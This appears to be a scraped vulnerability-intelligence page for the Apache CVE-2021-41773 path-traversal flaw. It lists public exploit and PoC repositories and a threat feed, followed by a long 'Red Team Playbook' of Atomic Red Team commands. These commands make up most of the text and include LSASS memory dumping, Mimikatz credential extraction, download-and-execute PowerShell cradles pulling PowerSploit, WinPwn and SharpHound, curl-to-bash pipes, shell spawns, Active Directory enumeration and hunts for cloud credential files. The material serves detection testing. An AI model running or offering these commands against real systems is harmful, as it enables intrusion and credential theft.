skentagon | 0 | 0 | 2022-02-27 | View |
|
bernardas/netsec-polygon
Environment for CVE-2021-41773 recreation.
|
bernardas | 0 | 0 | 2022-04-02 | View |
|
anldori/CVE-2021-41773-Scanner
CVE-2021-41773 Shodan scanner
|
anldori | 0 | 0 | 2022-05-12 | View |
|
ISabbiI/PoC-Apache-CVE-2021-41773-Infrastructure-LAB
|
ISabbiI | 0 | 0 | 2026-02-11 | View |
|
pwn3z/CVE-2021-41773-Apache-RCE
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path trave...
|
pwn3z | 0 | 0 | 2022-06-17 | View |
|
mightysai1997/cve-2021-41773
|
mightysai1997 | 0 | 0 | 2022-09-15 | View |
|
mightysai1997/CVE-2021-41773h
|
mightysai1997 | 0 | 0 | 2022-09-15 | View |
|
mightysai1997/cve-2021-41773-v-
|
mightysai1997 | 0 | 0 | 2022-09-15 | View |
|
mightysai1997/CVE-2021-41773-i-
|
mightysai1997 | 0 | 0 | 2022-09-15 | View |
|
mightysai1997/CVE-2021-41773-L-
|
mightysai1997 | 0 | 0 | 2022-09-15 | View |
|
mightysai1997/CVE-2021-41773-PoC
|
mightysai1997 | 0 | 0 | 2022-09-15 | View |
|
dileepdkumar/LayarKacaSiber-CVE-2021-41773
|
dileepdkumar | 0 | 0 | 2022-09-20 | View |
|
12345qwert123456/CVE-2021-41773
Vulnerable configuration Apache HTTP Server version 2.4.49
|
12345qwert123456 | 0 | 0 | 2022-11-18 | View |
|
Maybe4a6f7365/CVE-2021-41773
CVE-2021-41773.py
|
Maybe4a6f7365 | 0 | 0 | 2024-06-02 | View |
|
redspy-sec/CVE-2021-41773
|
redspy-sec | 0 | 0 | 2024-12-16 | View |
Threat Feed
16 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.